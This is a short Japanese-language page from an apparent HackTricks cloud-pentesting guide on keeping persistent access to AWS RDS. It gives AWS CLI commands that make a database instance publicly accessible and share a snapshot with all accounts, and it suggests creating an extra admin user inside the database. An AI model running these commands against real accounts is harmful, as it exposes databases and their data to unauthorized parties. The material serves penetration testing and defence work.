# AWS - RDS Persistence

{{#include ../../../../banners/hacktricks-training.md}}

## RDS

詳細は以下を参照:

{{#ref}}
../../aws-services/aws-relational-database-rds-enum.md
{{#endref}}

### インスタンスをパブリックに公開する: `rds:ModifyDBInstance`

この権限を持つ攻撃者は **既存の RDS インスタンスを変更して公開アクセスを有効にすることができます**。
```bash
aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately
```
### DB内に管理者ユーザーを作成する

攻撃者は単に**DB内にユーザーを作成する**ことで、マスターユーザーのパスワードが変更されてもデータベースへのアクセスを**失わない**。

### スナップショットを公開する
```bash
aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
```
{{#include ../../../../banners/hacktricks-training.md}}